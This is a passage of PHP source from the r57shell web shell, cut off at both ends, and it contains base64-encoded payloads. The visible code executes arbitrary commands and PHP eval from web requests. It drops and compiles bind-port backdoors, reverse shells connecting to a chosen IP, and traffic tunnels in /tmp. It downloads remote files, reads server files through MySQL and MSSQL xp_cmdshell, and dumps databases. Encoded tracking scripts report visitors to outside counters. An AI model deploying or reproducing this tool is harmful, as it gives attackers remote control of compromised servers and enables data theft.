+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC 
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs 
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz 
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print ""; +@readfile ("");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." 
<a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb.$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; 
+echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' 
-name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." 
&"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." 
&"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." 
|| $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! 
Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - 
".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! 
Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + 